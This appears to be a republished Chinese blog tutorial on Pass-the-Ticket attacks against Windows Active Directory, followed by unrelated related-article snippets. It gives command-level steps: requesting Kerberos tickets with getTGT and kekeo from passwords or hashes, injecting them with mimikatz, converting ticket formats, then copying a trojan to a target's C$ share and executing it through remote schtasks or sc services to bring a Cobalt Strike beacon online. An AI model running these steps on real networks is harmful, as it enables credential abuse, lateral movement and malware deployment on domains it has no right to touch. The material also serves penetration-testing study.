PTT票据传递攻击

一. PTT票据传递攻击原理

1.PTT介绍

PTT(Pass The Ticket),中文叫票据传递攻击,PTT 攻击只能用于kerberos认证中,NTLM认证中没有, PTT是通过票据进行认证的。

进行票据传递,不需要提权,域用户或者system用户就可以

在认证的过程中主要涉及2个票据:

TGT
ST
2.如何得到TGT和ST
通过域账号明文密码
通过域账号的NTLM-HASH
通过域账号的ASE
直接伪造
通过系统漏洞

二. PTT攻击的利用条件

1.进行PTT传递认证的条件
必须是域环境,域内才可以PTT
必须拥有相应的票据(主要是域管理员票据)
2.不同权限下票据传递的结果
  • 第一步:利用getTGT工具申请不同用户的票据
    域管用户(administrator),域内普通管理员(LEE),域内普通用户(test)

    getTGT.exe 域名/用户名:秘密(hash值)
    

在这里插入图片描述

  • 第二步:利用mimikatz进行票据传递

    命令:
    kerberos::ptc ccache文件 将票据注入内存中
    klist(cmd),kerberos::list(mimikatz)  查看票据列表
    klist purge(cmd),kerberos::purge(mimikatz) 清除本地票据
    

域管用户(administrator)
在这里插入图片描述
进行传递
DC(server 2012)
在这里插入图片描述
TWO-PC(server 2008)
在这里插入图片描述
FOUR-PC(server 2003)
在这里插入图片描述
查看票据
在这里插入图片描述
域内普通管理员(LEE)

在这里插入图片描述
进行传递
在这里插入图片描述
查看票据
在这里插入图片描述

域内普通用户(test)
在这里插入图片描述
进行传递
在这里插入图片描述
查看票据
在这里插入图片描述

总结
只有域管administrator和普通管理员的票据有权限进行PTT票据传递,而普通用户不行!

三. ccache和kirbi票据转换

不同的工具生成的票据后缀不一样常见的有两种Ccache和Kirbi,类似于压缩包rar和zip都是压缩文件

比如:getTgt生成的是Ccache, Kekeo生成Kirbi

1.使用kekeo生成票据
命令:Tgt::ask /user:域用户 /domain:域名 /password:密码
Gettgt命令 域名/域用户:密码

在这里插入图片描述
使用mimikatz打入内存中
在这里插入图片描述
这里文件后缀不同,要选择相应的方式
在这里插入图片描述

2.票据格式转换

后续我们的实验中不管生成哪种,都可以使用mimikatz进行传递
Kerberos::ptt
Kerberos::ptc
当然两种票据也可以相互转化使用ticketConverter.exe
命令: ticketConverter.exe xxx.ccache xxx.kirbi

四. 使用PTT进行CS上线

将票据导入内存中通信后
在这里插入图片描述
其实接下来和之前的步骤一样,先将木马copy到对方C盘

copy 木马 \\目标ip或者域名\C$

可以采用计划任务或者是服务的方式运行木马

计划任务
创建计划任务

schtasks /create /s IP /u 用户名 /p 密码 /tn 计划任务名称 /tr 实施任务 /sc onstart /RU system /F

运行计划任务

schtasks /run /s IP地址  /u username /p password /i /tn “计划任务名称”

删除计划任务

schtasks /delete /s IP地址 /u username /p password /tn “”计划任务名称“ /f

服务

创建服务

sc \\IP地址 create 服务名称 binpath="服务执行内容"

开启服务

sc \\IP地址 start 服务名称

删除服务

sc \\IP地址 delete 服务名称   

总结

  • PTH:用NTLM-HASH值进行认证-支持kerberos和NTLM认证
  • PTK:用AES值进行认证-只能用于kerberos认证
  • PTT:用票据进行认证-只能用于kerberos认证

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/diannao/15143.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

深入探讨Java泛型:详解Java泛型的工作原理,擦除,包括通配符以及在编程实践中的使用和注意事项

1. Java泛型简介 1. 泛型的主要目的 泛型主要有两个目的: 提高类型安全:在编译时进行严格的类型检查。有了泛型,可以确保在编译时而不是在运行时发现类型问题,从而降低了类类型转换错误的可能性。 消除代码冗余:避免在代码中使用过多的类型转换,提高代码的可读性和可…

HTTP 和高级编程

目录 一.HTTP 简介 HTTP 工作原理 HTTP 请求 HTTP 响应 HTTP 的常见应用 HTTP 的优点 HTTP 的缺点 二.使用 CHtmlView 类创建 Web 视图 创建 CHtmlView 控件 CHtmlView 类成员函数 CHtmlView 类事件 使用 CHtmlView 类创建 Web 浏览器 三.Web 浏览器应用程序示例 一…

【图书推荐】《Vue.js 3.x+Element Plus从入门到精通(视频教学版)》

本书用处 内容简介 本书通过对Vue.js(简称Vue)的示例和综合案例的介绍与演练,使读者快速掌握Vue.js 3.x框架的用法,提高Web前端的实战开发能力。本书配套示例源码、PPT课件、教学大纲、教案、同步教学视频、习题及答案、其他资源…

HTML+CSS 响应式导航栏

效果演示 Code <div class="navbar"><input type="checkbox"><span></span><span></span><ul><li><a href="#">点赞</a></li><li><a href="#">关注&…

模拟器玩游戏

IOS系统 【PPSSPP与Retroarch 模拟器上架苹果商店&#xff0c;教你如何玩转复古游戏模拟器】 安卓

SpringCloud+Python 混合微服务,如何打造AI分布式业务应用的技术底层?

尼恩&#xff1a;LLM大模型学习圣经PDF的起源 在40岁老架构师 尼恩的读者交流群(50)中&#xff0c;经常性的指导小伙伴们改造简历。 经过尼恩的改造之后&#xff0c;很多小伙伴拿到了一线互联网企业如得物、阿里、滴滴、极兔、有赞、希音、百度、网易、美团的面试机会&#x…

【数据结构】数据结构中的隐藏玩法——栈与队列

前言&#xff1a; 哈喽大家好&#xff0c;我是野生的编程萌新&#xff0c;首先感谢大家的观看。数据结构的学习者大多有这样的想法&#xff1a;数据结构很重要&#xff0c;一定要学好&#xff0c;但数据结构比较抽象&#xff0c;有些算法理解起来很困难&#xff0c;学的很累。我…

依赖管理与Springboot Starters

依赖管理与Spring Boot Starters 在现代软件开发过程中&#xff0c;依赖管理是一项至关重要的任务。随着应用程序规模的扩大&#xff0c;引入的依赖项数量也会增加&#xff0c;使得版本冲突和类路径问题成为常见的挑战。为了应对这些挑战&#xff0c;Spring Boot提供了一套简化…

【OpenCV 基础知识 11】计算通道像素值和

cvSplit()函数将复制src的各个通道到图像dst0&#xff0c;dst1&#xff0c;dst2和dst3中。如果源图像少于4个通道的情况下&#xff0c;那么传递给cvSplit()的不必要的目标参数可设置为NULL program cv_Sum;{$APPTYPE CONSOLE} {$R *.res}usesSystem.SysUtils,ocv.highgui_c,oc…

前端基于word模板导出word文档

项目环境 vue2 js vue-cli等 依赖包都可以在npm官网找到对应文档 npm官网(英文) 1、依赖 安装依赖 docxtemplater npm i docxtemplaterfile-saver npm i file-saverjszip-utils npm i jszip-utilsjszip npm i jszip在对应页面或模块中引入依赖 import Docxtemplater …

QQ个性网空间日志网站模板源码

QQ个性网空间日志网站模板源码自带后台登录设置&#xff0c;适用于博客、文章、资讯、其他类网站内容使用。模板自带eyoucms内核&#xff0c;原创设计、手工书写DIVCSS&#xff0c;完美兼容IE7、Firefox、Chrome、360浏览器等;主流浏览器;结构容易优化;多终端均可正常预览。由于…

力扣刷题---2206. 将数组划分成相等数对【简单】

题目描述&#x1f357; 给你一个整数数组 nums &#xff0c;它包含 2 * n 个整数。 你需要将 nums 划分成 n 个数对&#xff0c;满足&#xff1a; 每个元素 只属于一个 数对。 同一数对中的元素 相等 。 如果可以将 nums 划分成 n 个数对&#xff0c;请你返回 true &#xf…

react 低代码平台方案汇总

React作为当前最流行的前端框架之一&#xff0c;其生态系统中孕育了多种低代码平台方案&#xff0c;旨在加速应用开发过程。以下是几款基于React的低代码平台或工具&#xff0c;它们通过可视化构建、预制组件、数据绑定等功能&#xff0c;帮助开发者快速构建应用程序&#xff1…

【Tools】SpringBoot工程下的全局异常处理

Catalog SpringBoot工程下的全局异常处理一、需求二、实现 SpringBoot工程下的全局异常处理 一、需求 程序运行过程中没法保证一定不会出错&#xff0c;即程序中会报异常&#xff0c;而系统默认的异常信息的格式往往和我们自定义返回的消息格式不一致&#xff0c;还会影响返回…

力扣刷题---3146. 两个字符串的排列差

题目描述 给你两个字符串 s 和 t&#xff0c;每个字符串中的字符都不重复&#xff0c;且 t 是 s 的一个排列。 排列差 定义为 s 和 t 中每个字符在两个字符串中位置的绝对差值之和。 返回 s 和 t 之间的 排列差 。 示例 1&#xff1a; 输入&#xff1a;s “abc”, t “b…

AcWing 154. 滑动窗口——算法基础课题解

AcWing 154. 滑动窗口 题目描述 给定一个大小为 n≤10^6 的数组。 有一个大小为 &#x1d458; 的滑动窗口&#xff0c;它从数组的最左边移动到最右边。 你只能在窗口中看到 &#x1d458; 个数字。 每次滑动窗口向右移动一个位置。 以下是一个例子&#xff1a; 该数组为…

运用HTML、CSS设计Web网页——“西式甜品网”图例及代码

目录 一、效果展示图 二、设计分析 1.整体效果分析 2.头部header模块效果分析 3.导航及banner模块效果分析 4.分类classify模块效果分析 5.产品展示show模块效果分析 6.版权banquan模块效果分析 三、HTML、CSS代码分模块展示 1. 头部header模块代码 2.导航及bann…

【SpringCloud】Spring Cloud基本介绍

目录 回顾架构分类单体架构分布式架构微服务架构什么是微服务优点缺点微服务的架构特征&#xff1a;微服务架构面临的挑战技术挑战微服架构的设计原则微服务概念提供者(Provider)消费者(Consumer)RPC和Restful集群分布式 总结 服务拆分和远程调用服务拆分原则服务拆分示例 思考…

docker和docker-compose安装

1.安装docker 安装所需的软件包 sudo yum install -y yum-utils device-mapper-persistent-data lvm2#设置阿里源 sudo yum-config-manager --add-repo http://mirrors.aliyun.com/docker-ce/linux/centos/docker-ce.repo更新软件包索引 sudo yum makecache fast查询可安装…

力扣爆刷第143天之二叉树五连刷(二叉搜索树)

力扣爆刷第143天之二叉树五连刷&#xff08;二叉搜索树&#xff09; 文章目录 力扣爆刷第143天之二叉树五连刷&#xff08;二叉搜索树&#xff09;一、530. 二叉搜索树的最小绝对差二、501. 二叉搜索树中的众数三、236. 二叉树的最近公共祖先四、235. 二叉搜索树的最近公共祖先…